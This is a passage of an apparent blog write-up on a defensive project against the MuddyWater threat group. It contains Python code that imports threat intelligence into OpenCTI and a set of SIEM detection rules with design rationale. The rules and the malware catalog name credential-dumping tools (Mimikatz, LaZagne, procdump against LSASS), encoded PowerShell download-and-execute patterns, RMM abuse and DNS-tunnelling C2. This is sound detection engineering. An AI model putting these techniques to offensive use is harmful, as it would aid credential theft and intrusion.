a shift toward in-house tooling "<br>            "(BugSleep, AnchorRAT) beginning ~May 2024."<br>        ),<br>        resource_level="government",<br>        primary_motivation="espionage",<br>        confidence=85,<br>        objectMarking=[TLP_WHITE],<br>        createdBy=MOIS_ID,<br>    )<br>    MW_ID = obj["id"]<br>link(MW_ID, MOIS_ID, "attributed-to", 85)<br># ── Step 3: Malware catalog ────────────────────────────────────────────────────<br>MALWARE_CATALOG = [<br>    {"name": "POWERSTATS",  "aliases": ["Powermud"],   "description": "MuddyWater first-stage PowerShell backdoor (MITRE S0223)."},<br>    {"name": "PowGoop",     "aliases": ["Goopdate"],   "description": "DLL loader hijacking GoogleUpdate.exe via side-loading (MITRE S1046)."},<br>    {"name": "Small Sieve", "aliases": [],             "description": "Python backdoor compiled as NSIS; Telegram Bot API C2; OutlookMicrosift Run key."},<br>    {"name": "Canopy",      "aliases": ["Starwhale"],  "description": "Excel-macro dropper; startup folder persistence; HTTP POST C2."},<br>    {"name": "Mori",        "aliases": [],             "description": "DNS-tunneling backdoor deployed as FML.dll via regsvr32.exe."},<br>    {"name": "BugSleep",    "aliases": [],             "description": "In-house backdoor (2024); 43-minute scheduled task; shellcode injection."},<br>    {"name": "AnchorRAT",   "aliases": [],             "description": "Custom RAT (2024); COM hijacking persistence (T1546.015)."},<br>    {"name": "SyncroRAT",   "aliases": [],             "description": "RMM-based RAT; Technion campaign (Feb 2023); Log4j initial access."},<br>    {"name": "DarkBit",     "aliases": [],             "description": "Ransomware/wiper; Technion attack; vssadmin shadow copy deletion."},<br>]<br>MALWARE_IDS = {}<br>for m in MALWARE_CATALOG:<br>    existing = _find(api.malware, m["name"])<br>    if existing:<br>        MALWARE_IDS[m["name"]] = existing["id"]<br>    else:<br>        obj = api.malware.create(<br>            name=m["name"], aliases=m["aliases"],<br>            description=m["description"], is_family=False,<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        MALWARE_IDS[m["name"]] = obj["id"]<br># ── Step 4: Tool catalog ──────────────────────────────────────────────────────<br>TOOL_CATALOG = [<br>    {"name": "AteraAgent",  "aliases": ["Atera RMM"], "description": "Commercial RMM abused for persistent remote access via phishing."},<br>    {"name": "SimpleHelp",  "aliases": [],            "description": "Commercial RMM abused in 2024 Israeli targeting."},<br>    {"name": "Mimikatz",    "aliases": [],            "description": "LSASS credential dumping (T1003.001), used with procdump64.exe."},<br>    {"name": "LaZagne",     "aliases": [],            "description": "LSA secrets (T1003.004) and cached domain credential dumping (T1003.005)."},<br>]<br>TOOL_IDS = {}<br>for t in TOOL_CATALOG:<br>    existing = _find(api.tool, t["name"])<br>    if existing:<br>        TOOL_IDS[t["name"]] = existing["id"]<br>    else:<br>        obj = api.tool.create(<br>            name=t["name"], aliases=t["aliases"],<br>            description=t["description"],<br>            objectMarking=[TLP_WHITE], createdBy=MOIS_ID,<br>        )<br>        TOOL_IDS[t["name"]] = obj["id"]<br># ── Step 5: uses relationships ────────────────────────────────────────────────<br>for mid in MALWARE_IDS.values():<br>    link(MW_ID, mid, "uses", 80)<br>for tid in TOOL_IDS.values():<br>    link(MW_ID, tid, "uses", 80)<br># ── Step 6: Reports from sources.yaml ────────────────────────────────────────<br>SOURCE_DATES = {<br>    "src_usgov_aa22_055a_pdf_mirror":        "2022-02-24T00:00:00.000Z",<br>    "src_incd_muddywater_darkbit_2023":      "2023-02-07T00:00:00.000Z",<br>    "src_incd_muddywater_2024_evolution":    "2024-06-01T00:00:00.000Z",<br>    "src_cisa_aa22_055a_page":               "2022-02-24T00:00:00.000Z",<br>    "src_ncsc_uk_muddywater_joint_advisory": "2022-02-24T00:00:00.000Z",<br>    "src_incd_recent_phishing_1947":         "2024-09-01T00:00:00.000Z",<br>    "src_mitre_attack_muddywater_g0069":     "2024-01-01T00:00:00.000Z",<br>}<br>REPORT_IDS = {}<br>for src in SOURCES:<br>    src_id   = src["id"]<br>    title    = src["title"]<br>    pub_date = SOURCE_DATES.get(src_id, "2023-01-01T00:00:00.000Z")<br>    confidence = 85 if src.get("source_reliability") == "A" else 70<br>    description = (<br>        f"Publisher: {src['publisher']}\n"<br>        f"Reliability: {src.get('source_reliability','?')} / "<br>        f"Credibility: {src.get('information_credibility','?')}\n"<br>        f"URL: {src['url']}\n"<br>        f"Actor claims: {', '.join(src.get('actor_claims', []))}\n"<br>        f"ATT&amp;CK candidates: {', '.join(src.get('candidate_attck_techniques', []))}"<br>    )<br>    existing = _find(api.report, title)<br>    if existing:<br>        REPORT_IDS[src_id] = existing["id"]<br>    else:<br>        obj = api.report.create(<br>            name=title, published=pub_date,<br>            description=description,<br>            report_types=["threat-report"],<br>            confidence=confidence,<br>            objectMarking=[TLP_WHITE],<br>            createdBy=MOIS_ID,<br>            objects=[MW_ID],<br>        )<br>        REPORT_IDS[src_id] = obj["id"]<br># ── Step 7: ATT&amp;CK pattern links from procedures ──────────────────────────────<br>linked, stubs = set(), []<br>for proc in PROCEDURES:<br>    for candidate in proc.get("attck_candidates", []):<br>        tid = candidate["technique"]<br>        if tid in linked:<br>            continue<br>        pattern_id, created_as_stub = find_or_create_attack_pattern(tid)<br>        link(MW_ID, pattern_id, "uses", 75)<br>        linked.add(tid)<br>        if created_as_stub:<br>            stubs.append(tid)<br># ── Summary ───────────────────────────────────────────────────────────────────<br>print(f"Import complete - malware: {len(MALWARE_IDS)}, tools: {len(TOOL_IDS)}, "<br>      f"reports: {len(REPORT_IDS)}, ATT&amp;CK links: {len(linked)}, stubs: {len(stubs)}")<br></pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*WMvnfWfF50hj3Rk60DBAxA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XMTEbgDPokzU9iTK3sjEww.png"></figure><p><strong>Result:</strong> All objects created. Re-run confirms idempotency (no duplicates).</p><h4>Step 13: Intrusion Set Verification</h4><p><strong>Result:</strong> MuddyWater entity with all aliases, Iran MOIS attribution relationship, campaign links, and malware/tool associations confirmed in OpenCTI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*5KWUHIP3nkUhF6wpQpDa3g.png"></figure><h4>Step 14: Knowledge Graph</h4><p><strong>Result:</strong> Graph shows MuddyWater → 9 malware, 4 tools, 3 campaigns, 21 ATT&amp;CK techniques — all with source-annotated relationship edges.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-B2D00HhbhmdA5rtGm7klA.png"></figure><h4>Step 15: ATT&amp;CK Matrix Coverage</h4><p><strong>Result:</strong> 21 techniques highlighted across 8 tactics in the ATT&amp;CK Enterprise matrix.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*4XphzS2vtf-peVJ-ArTglg.png"></figure><h4>Step 16: BugSleep Malware Detail</h4><p><strong>Result:</strong> BugSleep malware object with INCD 2024 source annotation, T1053.005 relationship (43-minute task), and C2 technique links confirmed.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3rt63a6jCO_-fk-BLdyaTw.png"></figure><h4>Step 17: Reports List</h4><p><strong>Result:</strong> 20 report objects, one per promoted source. Each report links to the procedures and techniques it evidences.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*-Ej71hGDspW3ahdqZWATAA.png"></figure><h4>Step 19: OpenCTI Dashboard</h4><p><strong>Result:</strong> Custom dashboard showing technique frequency heatmap by source tier — highest-corroborated techniques visible at a glance.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*_HccHBJxzb-ZZu93WImMhg.png"></figure><h3>Phase 4: Detection Atlas</h3><p>The detection atlas is the core analytical output. Each of the 11 detection records in <a href="https://github.com/anpa1200/operation-desert-hydra/blob/main/data/detections.yaml">data/detections.yaml</a> contains:</p><ul><li>The specific MuddyWater behavior it targets (not the ATT&amp;CK technique category)</li><li>Required log sources and capability gates</li><li>Multi-rule pseudologic (SIEM-agnostic — works as a template for Sigma, KQL, SPL, or any rule format)</li><li>False positive classes and tuning guidance</li><li>A creation_logic field explaining <em>why</em> the rule is designed this way — the design decision, not just what the rule does</li></ul><p>Coverage scores follow a strict scale: <strong>5</strong> = lab-validated with a Kibana screenshot. <strong>4</strong> = correlated analytic (good logic, single source or partial lab). <strong>3</strong> = behavioral detection with partial validation. A score of 5 requires a proof, not just passing pseudologic.</p><p><strong>Step 20 — Analyst Review</strong></p><p>Before any detection went to validation, every record went through a review pass that checked: operator precedence in multi-clause conditions, access mask completeness for LSASS detection, path allowlist accuracy for the GoogleUpdate/Goopdate IoC, and ATT&amp;CK technique coverage gaps. The review fixed a real operator precedence bug in det_mw_0010 Rule B where the command_line clause was outside the event_type guard, tightened the LSASS access mask set, improved T1033 coverage in det_mw_0009 Rule C via Win32_ComputerSystem, and added the x86/x64 Google installation path allowlist to det_mw_0004 Rule A.</p><h4>det_mw_0001 — Email Delivery Correlated with Process Spawn</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/796/1*ycAoCbrkdxo6oxx4X0Gkhw.png"></figure><p><em>Techniques: T1566.001, T1566.002 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater delivers malicious content three ways — ZIP or Office macro attachments, links to Egnyte/OneDrive delivering RMM installers, and emails from compromised accounts. Corroborated by CISA AA22–055A, INCD 2023, and INCD 2024. The highest-priority initial access vector in the dataset.</p><p><strong>Why it’s built this way:</strong> Email delivery alone is not a detection signal — MuddyWater’s phishing emails are indistinguishable from legitimate mail at the gateway layer. The detection value comes from correlating delivery with a process spawn on the recipient endpoint within a tight 5-minute window. The parent process constraint (Outlook, browser) is the key limiter: it restricts scope to email-triggered or link-triggered execution, which is exactly the documented delivery chain. Both attachment-based and link-based delivery methods are covered because all variants are source-confirmed. The correlated logic type reflects that neither event alone is sufficient — only the combination is meaningful.</p><p><strong>Required telemetry:</strong> Email gateway or SEG with attachment metadata and URL extraction. EDR or Sysmon Event ID 1 with parent image and command line. Without the gateway telemetry, this detection degrades to parent-process heuristics only and loses the delivery-correlation value.</p><pre>event_type IN [email_delivery] AND<br>  (attachment.extension IN ["zip","xlsx","xlsm","pdf","docm"] OR<br>   link.domain IN ["egnyte.com","onedrive.live.com","1drv.ms"])<br>CORRELATE WITHIN 300 seconds WITH<br>event_type IN [process_create] WHERE<br>  parent_image IN ["OUTLOOK.EXE","chrome.exe","firefox.exe","msedge.exe"] AND<br>  image IN ["powershell.exe","cmd.exe","wscript.exe","mshta.exe",<br>            "AteraAgent.exe","ScreenConnect.exe","SimpleHelp.exe","rport.exe"]</pre><p><strong>Key false positives:</strong> Legitimate macro-enabled Office files from internal users. IT-approved RMM tools deployed via email links during onboarding. Tune by excluding known sender domains and approved RMM deployment windows.</p><h4>det_mw_0002 — Web Service Spawning Interpreter Shell</h4><p><em>Techniques: T1190 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater uses public-facing exploitation as a secondary initial access vector — CVE-2020–0688 (Exchange), CVE-2020–1472 (Netlogon/Zerologon), CVE-2021–44228 (Log4j), and unspecified VPN vulnerabilities from INCD 2024.</p><p><strong>Why it’s built this way:</strong> The detection targets the post-exploitation moment — a web service spawning a shell — rather than the exploit payload itself. This is deliberately CVE-agnostic: it fires on CVE-2020–0688, CVE-2020–1472, Log4j, and any unnamed VPN vulnerability without needing individual exploit signatures. The parent process list maps directly to the documented CVEs: w3wp.exe covers Exchange and IIS, java.exe covers Log4j, lsass.exe covers Netlogon exploitation leading to SYSTEM-level shell creation. The SYSTEM integrity level filter is the key noise reducer — legitimate administrative scripts rarely run at SYSTEM under IIS application pools without a clear documented reason.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with full parent-child chain and integrity level. IDS/IPS for CVE-specific signatures as a complementary layer.</p><pre>event_type = process_create AND<br>parent_image IN ["w3wp.exe","java.exe","lsass.exe","services.exe",<br>                 "vmtoolsd.exe","vpnagent.exe"] AND<br>image IN ["cmd.exe","powershell.exe","wscript.exe","cscript.exe","bash.exe"] AND<br>(parent_user IN ["NETWORK SERVICE","IIS_IUSRS","SYSTEM"] OR<br> integrity_level = "System")</pre><p><strong>Key false positives:</strong> Legitimate administrative scripts under IIS application pools. Java-based monitoring agents that spawn processes. Tune by process hash allowlisting for known-good management tools.</p><h4>det_mw_0003 — PowerShell Encoded Command and Script Obfuscation</h4><p><em>Techniques: T1059.001, T1027 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> PowerShell obfuscation is a cross-cutting technique present in every MuddyWater tool tier — PowGoop (Base64 C2 setup), POWERSTATS (IEX + web request for stage delivery), and the 2024 lure campaigns (embedded API key executed via PowerShell). Three distinct usage patterns across tools required three rules.</p><p><strong>Why it’s built this way:</strong> Each rule targets a different MuddyWater PowerShell pattern with a different telemetry requirement.</p><p>Rule A targets PowGoop and POWERSTATS loader delivery. The regex \s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,} is deliberately written to match all unambiguous prefix forms of -EncodedCommand (-e, -ec, -en, -enc) while the 50-character minimum for the Base64 blob avoids matching the -Encoding parameter. This is the operator precision that matters: -Encoding UTF8 would otherwise match a naive regex.</p><p>Rule B targets POWERSTATS script execution behavior: IEX combined with a web request. This is the decoded content layer — it requires Script Block Logging (Event ID 4104), which is the capability gate that determines whether this detection class exists at all in a given environment.</p><p>Rule C is the delivery-context fallback: PowerShell spawned by an Office application, email client, or browser has no legitimate explanation in a standard enterprise environment and fires regardless of whether Script Block Logging is enabled.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rule B and for the highest-fidelity version of this detection. Sysmon Event ID 1 for Rules A and C. Without Script Block Logging, the detection degrades to command-line heuristics only.</p><pre># Rule A — Encoded command flag (all prefix forms: -e, -ec, -en, -enc ...)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line IMATCHES "\s-e[a-zA-Z]*\s+[A-Za-z0-9+/=]{50,}"</pre><pre># Rule B — Script Block content (Event ID 4104)<br>event_type = script_block_log AND<br>script_block_text MATCHES "(IEX|Invoke-Expression|InvokeScript)" AND<br>script_block_text MATCHES "(WebClient|Invoke-WebRequest|DownloadString|Net\.Http)"</pre><pre># Rule C — Suspicious parent process<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>parent_image IN ["OUTLOOK.EXE","winword.exe","excel.exe",<br>                 "chrome.exe","firefox.exe","msedge.exe","WScript.exe"]</pre><p><strong>Key false positives:</strong> Administrative scripts using -EncodedCommand for special characters. SCCM/Ansible deployments running Base64-encoded payloads. Baseline known-good encoded commands by hash before alerting on Rule A.</p><h4>det_mw_0004 — Unsigned DLL Loaded by Signed Executable</h4><p><em>Techniques: T1574.002 · Score: 3 (behavioral, partial validation)</em></p><p><strong>What it targets:</strong> PowGoop’s execution method — a malicious DLL renamed Goopdate.dll placed alongside GoogleUpdate.exe, causing the legitimate signed binary to load it. Confirmed in 2024 toolset by INCD 2024.</p><p><strong>Why it’s built this way:</strong> Two rules serve different confidence tiers. Rule A is sourced directly from the documented PowGoop technique: the specific process name (GoogleUpdate.exe), DLL name (Goopdate.dll), and the fact that any path outside the Google installation directories is anomalous. The allowlist covers both x86 and x64 installation paths because omitting either creates a bypass. This combination — specific binary, specific DLL name, path outside expected directory — is near-unique and fires with high precision. Rule B is the generic behavioral net for future DLL side-loading variants where the actor may use different binary names — it trades precision for coverage against toolset evolution.</p><p>Score is 3 (not 5) because the lab’s stub DLL did not produce sufficient Sysmon EID 7 signal during validation. The detection logic is sound; the telemetry dependency (Sysmon image load events with signing status) is the constraint.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 7 (ImageLoad) with signed/unsigned status — this is the hard dependency. Without it, DLL loads are invisible to SIEM-based detection.</p><pre># Rule A — Specific IoC: GoogleUpdate loading Goopdate from non-Google path<br>event_type = image_load AND<br>image ENDSWITH "GoogleUpdate.exe" AND<br>loaded_image ENDSWITH "Goopdate.dll" AND<br>NOT (loaded_image_path STARTSWITH "C:\Program Files (x86)\Google\" OR<br>     loaded_image_path STARTSWITH "C:\Program Files\Google\")</pre><pre># Rule B — Generic: signed process loading unsigned DLL from user-writable path<br>event_type = image_load AND<br>process_signed = true AND<br>loaded_image_signed = false AND<br>loaded_image_path MATCHES "(\\Users\\|\\AppData\\|\\Temp\\|\\ProgramData\\)"</pre><p><strong>Key false positives:</strong> Third-party software shipping unsigned DLLs alongside signed executables (common). Developer workstations with locally compiled DLLs. Rule B requires environment-specific tuning before production deployment.</p><h4>det_mw_0005 — Registry Run Key and Startup Folder Persistence</h4><p><em>Techniques: T1547.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Multiple MuddyWater malware families use Run key persistence with actor-specific value names. Small Sieve: OutlookMicrosift (deliberate typo mimicking Microsoft). AA22-055A documents a second key: SystemTextEncoding. Canopy installs a WSF script in the startup folder — a sub-technique that doesn't appear as a Run key write.</p><p><strong>Why it’s built this way:</strong> Three rules cover three distinct persistence mechanisms across the malware catalog. Rule A is an exact-match IoC alert on the two named value names — it fires immediately on any match without needing path or parent context, because these specific strings have no legitimate usage in a standard enterprise environment. Rule B is the behavioral safety net for unknown or renamed values: path heuristic (AppData/Temp) combined with a non-installer parent covers the common pattern of malware writing its own persistence without using an installer. The process_integrity_level filter removes high-integrity (admin-level) processes from the behavioral rule because legitimate software installers typically run elevated. Rule C is added specifically to cover Canopy's startup folder WSF persistence, which doesn't show up as a Run key write at all — it's a file creation event.</p><p><strong>Required telemetry:</strong> Sysmon Event ID 13 (registry value set) for Rules A and B. Sysmon Event ID 11 (file create) for Rule C.</p><pre># Rule A — Specific IoC: known MuddyWater Run key value names<br>event_type = registry_set AND<br>registry_key MATCHES "\\CurrentVersion\\Run" AND<br>registry_value_name IN ["OutlookMicrosift","SystemTextEncoding"]<br><br><br># Rule B - Behavioral: Run key pointing to writable/unusual path<br>event_type = registry_set AND<br>registry_key MATCHES "(HKCU|HKLM)\\.*\\CurrentVersion\\Run" AND<br>registry_value_data MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>process_image NOT IN ["msiexec.exe","setup.exe","install.exe","update.exe"] AND<br>process_integrity_level NOT IN ["High","System"]<br># Rule C - Script files written to startup folder (covers Canopy WSF)<br>event_type = file_create AND<br>file_path MATCHES "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" AND<br>file_extension IN ["wsf","vbs","js","ps1","bat","cmd"]</pre><p><strong>Key false positives:</strong> Rule A has essentially zero false positives on the specific value names. Rule B requires installer process exclusion — the list is environment-specific. Rule C may fire on legitimate startup scripts deployed by IT via Group Policy; exclude by file hash or signer.</p><h4>det_mw_0006 — Scheduled Task with 43-Minute Beacon Interval</h4><p><em>Techniques: T1053.005 · Score: 4 (correlated analytic)</em></p><p><strong>What it targets:</strong> BugSleep creates a Windows scheduled task triggered every 43 minutes for C2 beaconing — a specific behavioral fingerprint documented in the INCD 2024 report. The interval is documented as customizable, but 43 minutes is the observed operational value.</p><p><strong>Why it’s built this way:</strong> The 43-minute interval is the single most precise artifact in the entire procedure dataset. Rule A is designed as a high-fidelity immediate alert requiring no tuning: PT43M is the ISO 8601 duration format for 43 minutes and appears verbatim in the Windows Task XML. This fires with near-zero false positives because no legitimate software uses a 43-minute repeat interval for any standard purpose. Rule B generalizes the pattern for future BugSleep variants that may use a different interval: short repetition (under 60 minutes) combined with a task action pointing to a user-writable path is anomalous regardless of exact interval. Rule C is the telemetry fallback — many environments do not forward Task Scheduler event logs to SIEM, but schtasks.exe process creation (Sysmon EID 1) is more commonly collected and captures the command line.</p><p>Score is 4 (not 5) because this is a single-source procedure — INCD 2024 only. Before treating Rule A as a high-confidence production alert, corroborate with a second vendor source.</p><p><strong>Required telemetry:</strong> Windows Security Event ID 4698 (scheduled task created) or Task Scheduler operational log for Rules A and B. Sysmon Event ID 1 for Rule C.</p><pre># Rule A — Specific: 43-minute interval (BugSleep artifact) — immediate alert<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval = "PT43M"<br><br># Rule B - Behavioral: short interval + suspicious action path<br>event_type = scheduled_task_created AND<br>task_trigger_repetition_interval_minutes &lt; 60 AND<br>task_action_path MATCHES "(\\AppData\\|\\Temp\\|\\ProgramData\\|\\Users\\)" AND<br>creating_process NOT IN ["svchost.exe","taskeng.exe","msiexec.exe"]<br># Rule C - Sysmon command line fallback<br>event_type = process_create AND<br>image ENDSWITH "schtasks.exe" AND<br>command_line MATCHES "/create" AND<br>command_line MATCHES "(AppData|Temp|ProgramData)"</pre><p><strong>Key false positives:</strong> Backup and monitoring software creating frequent tasks. Browser update mechanisms. Rule B requires interval baseline per environment before production deployment.</p><h4>det_mw_0007 — RMM Tool Executed from User-Writable Path</h4><p><em>Techniques: T1219 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> RMM tool abuse is the most consistently documented MuddyWater technique across all source tiers — five independent government and vendor sources corroborate it. Tool inventory across campaigns: ScreenConnect (2022), SyncroRAT (Israel 2023), rport.exe (DarkBit operation), AteraAgent (multiple sources), SimpleHelp, Level, PDQConnect (2024).</p><p><strong>Why it’s built this way:</strong> RMM tool detection is inherently a context problem. The binary is legitimate. The network traffic to vendor infrastructure is legitimate. Only the delivery chain and execution path are anomalous. Three rules address this from different angles.</p><p>Rule A uses path as the primary signal: a legitimately IT-deployed RMM tool installs to Program Files or a managed path, not AppData/Temp/Downloads. A known RMM binary executing from a user-writable path means it was delivered, not installed by IT.</p><p>Rule B uses parent process as the signal: no legitimate RMM deployment is spawned by Outlook, a browser, or an archive utility. This is the delivery-context constraint — if an RMM binary’s parent is OUTLOOK.EXE, the delivery chain is phishing regardless of what the binary is.</p><p>Rule C uses network destination: RMM infrastructure connections from endpoints with no authorized RMM deployment are anomalous. Rules A+C together — RMM binary from writable path plus outbound connection to vendor domain — form the highest-confidence combined signal.</p><p><strong>The baseline prerequisite is non-negotiable.</strong> Rule C without a baseline of authorized RMM deployments per endpoint generates constant noise in any environment that legitimately uses RMM tools. This is the single highest-ROI detection in the dataset if the baseline is clean.</p><p><strong>Required telemetry:</strong> EDR or Sysmon Event ID 1 with parent image and file path. Network flow or proxy logs with process name attribution for Rule C.</p><pre># Rule A — Known RMM binary from non-standard installation path<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR<br> image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR<br> image ENDSWITH "rport.exe" OR<br> image ENDSWITH "SyncroRAT.exe" OR<br> image ENDSWITH "Level.exe" OR<br> image ENDSWITH "PDQConnect.exe") AND<br>image_path MATCHES "(\\AppData\\|\\Temp\\|\\Downloads\\|\\Users\\[^\\]+\\Desktop\\)"<br><br># Rule B - RMM binary spawned by email client or browser<br>event_type = process_create AND<br>(image ENDSWITH "AteraAgent.exe" OR image ENDSWITH "ScreenConnect.exe" OR<br> image ENDSWITH "SimpleHelp.exe" OR image ENDSWITH "rport.exe") AND<br>parent_image IN ["OUTLOOK.EXE","outlook.exe","chrome.exe","firefox.exe",<br>                 "msedge.exe","7zFM.exe","WinRAR.exe","explorer.exe"]<br># Rule C - Outbound connection to RMM vendor infrastructure from unexpected endpoint<br>event_type = network_connection AND<br>destination_domain MATCHES "(atera\.com|screenconnect\.com|simplehelp\.net|syncromsp\.com)" AND<br>source_process NOT IN [known_rmm_processes_baseline]</pre><p><strong>Key false positives:</strong> All RMM tools are legitimate software — the entire detection depends on delivery context and path. Authorized deployments must be baselined per endpoint before any rule produces useful signal. Help desk technicians installing RMM from their downloads folder will match Rule A; exclude by user account or machine type.</p><h4>det_mw_0008a — Non-Browser Process Connecting to Telegram Bot API</h4><p><em>Techniques: T1071.001, T1102 · Score: 3 (behavioral, partially validated)</em></p><p><strong>What it targets:</strong> Small Sieve beacons exclusively via the Telegram Bot API (api.telegram.org) over HTTPS. This is one of the most specific C2 channels documented for MuddyWater — a fixed, known hostname with no CDN rotation.</p><p><strong>Why it’s built this way:</strong> The detection is single-rule because the signal is specific enough not to need graduated fallbacks. api.telegram.org is a fixed hostname. The discriminating condition is not the domain but the process: in enterprise environments where Telegram is not a standard application, any process connecting to this endpoint is anomalous. The approach is deliberately narrow — it will miss if MuddyWater switches from Telegram to another messaging API, but fires with high precision on the documented Small Sieve C2 channel.</p><p>Score is 3 because VirtualBox NAT blocked outbound Telegram connections in the lab, preventing full Kibana validation of the network connection event.</p><p><strong>Required telemetry:</strong> DNS query logs or network flow logs with process name attribution. In environments without process-attributed network telemetry, this degrades to a domain-based alert with no process context.</p><pre>event_type = network_connection AND<br>destination_domain = "api.telegram.org" AND<br>destination_port = 443 AND<br>source_process NOT IN ["Telegram.exe","telegram.exe","chrome.exe",<br>                        "firefox.exe","msedge.exe","iexplore.exe"]</pre><p><strong>Key false positives:</strong> Telegram desktop application where it is approved. Bot developers testing scripts from dev workstations. In organizations where Telegram is standard, strict process allowlisting is required before this detection is useful.</p><h4>det_mw_0008b — DNS Tunneling Volume and Entropy</h4><p><em>Techniques: T1572 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> Mori, MuddyWater’s DNS-tunneling backdoor, uses DNS queries as the C2 channel. DNS tunneling encodes data in subdomain labels, producing distinctive patterns: high query volume to a single domain, unusually long subdomain strings, and high Shannon entropy in the label content.</p><p><strong>Why it’s built this way:</strong> DNS tunneling detection cannot rely on a single heuristic because each heuristic has a different failure mode. Volume (Rule A) catches high-throughput tunneling but misses slow/low-rate tools that deliberately throttle to blend in. Label length (Rule B) catches encoded payloads regardless of rate or entropy but misses short encoded segments. Entropy (Rule C) catches random-looking subdomains at any length and rate but produces noise on CDN hash labels without a comprehensive baseline. The three rules are additive — any single trigger warrants investigation, two or more from the same source are high-confidence.</p><p>The thresholds (&gt;100 queries per 60 seconds, &gt;40-character labels, &gt;3.5 Shannon entropy) were validated in the lab by generating 180 DNS queries with 42-character random subdomains from the simulation playbook.</p><p><strong>Required telemetry:</strong> DNS resolver logs with full QNAME — not available in all environments. If only DNS flow logs (not query content) are available, Rule B and Rule C are unavailable.</p><pre># Rule A — High query volume to single parent domain<br>event_type = dns_query<br>GROUP BY source_ip, query_domain_parent<br>HAVING COUNT(*) &gt; 100 WITHIN 60 seconds<br><br># Rule B - Long subdomain labels (&gt;40 chars indicates encoded payload)<br>event_type = dns_query AND<br>LENGTH(subdomain_label) &gt; 40<br># Rule C - High entropy subdomains (random-looking encoded content)<br>event_type = dns_query AND<br>SHANNON_ENTROPY(subdomain_label) &gt; 3.5 AND<br>subdomain_label NOT IN [known_cdn_domains_baseline]</pre><p><strong>Key false positives:</strong> CDN domains using hash-based subdomains (Akamai, Cloudflare, AWS) — require comprehensive allowlist for Rule C. DNSSEC validation traffic with long encoded keys. Calibrate thresholds against your specific environment’s DNS baseline before deploying Rule A in production.</p><h4>det_mw_0009 — WMI SecurityCenter2 Discovery Survey</h4><p><em>Techniques: T1047, T1082, T1016, T1033, T1518.001 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> CISA AA22–055A reproduces the exact PowerShell survey script MuddyWater uses post-access: a WMI query chain that collects IP addresses (Win32_NetworkAdapterConfiguration), OS name and architecture (Win32_OperatingSystem), hostname, domain, username (Win32_ComputerSystem), and AV product names (root\SecurityCenter2\AntiVirusProduct). The collected data is assembled into a delimited string, encoded, and sent to C2.</p><p><strong>Why it’s built this way:</strong> The detection anchors on SecurityCenter2\AntiVirusProduct because it is the highest-specificity WMI class in the documented survey. The other classes — OS name, IP addresses, hostname — are queried by dozens of legitimate monitoring tools. AntiVirusProduct enumeration has a much smaller legitimate caller population: primarily AV management consoles and endpoint security platforms. This makes it the most reliable low-noise signal from the full survey chain.</p><p>Three rules are layered by telemetry quality. Rule A requires Script Block Logging (highest fidelity, decoded script content visible). Rule B falls back to command-line logging — medium fidelity, only fires if SecurityCenter2 appears in the literal command line, not in a decoded payload. Rule C is the most specific: a multi-class pattern that matches the complete documented survey chain, covering all five ATT&amp;CK techniques in a single event. T1033 coverage was added to Rule C via Win32_ComputerSystem during the analyst review pass — it was missing from the initial draft.</p><p>Rule C matches the CISA-documented script closely enough to be treated as near-exact-match when observed.</p><p><strong>Required telemetry:</strong> Script Block Logging (Event ID 4104) — required for Rules A and C. Sysmon Event ID 1 for Rule B.</p><pre># Rule A — Script Block captures SecurityCenter2 query<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "AntiVirusProduct"<br><br># Rule B - Process command line contains SecurityCenter2 (fallback without SBL)<br>event_type = process_create AND<br>image ENDSWITH "powershell.exe" AND<br>command_line MATCHES "SecurityCenter2"<br># Rule C - Full survey pattern: all 5 ATT&amp;CK techniques in one event<br># T1518.001 (AV enum) + T1016 (network config) + T1082 (OS info) + T1033 (username)<br>event_type = script_block_log AND<br>script_block_text MATCHES "SecurityCenter2" AND<br>script_block_text MATCHES "Win32_NetworkAdapterConfiguration" AND<br>script_block_text MATCHES "Win32_OperatingSystem" AND<br>script_block_text MATCHES "(Win32_ComputerSystem|Win32_UserAccount|UserName)"</pre><p><strong>Key false positives:</strong> AV management software and endpoint security platforms querying SecurityCenter2. IT inventory tools (Lansweeper, SCCM hardware inventory). Exclude by process hash or signer rather than by process name, since attackers can rename their scripts.</p><h4>det_mw_0010 — LSASS Memory Access and Credential Tool Execution</h4><figure><img alt="" src="https://cdn-images-1.medium.com/max/699/1*J0Q8ExDAG7jBY7duoI35MA.png"></figure><p><em>Techniques: T1003.001, T1003.004, T1003.005 · Score: 5 (lab-validated)</em></p><p><strong>What it targets:</strong> MuddyWater performs credential access using three tools documented in CISA AA22–055A: Mimikatz and procdump64.exe against LSASS memory (T1003.001), and LaZagne for LSA secrets (T1003.004) and cached domain credentials (T1003.005).</p><p><strong>Why it’s built this way:</strong> Three independent rules cover the full credential dumping 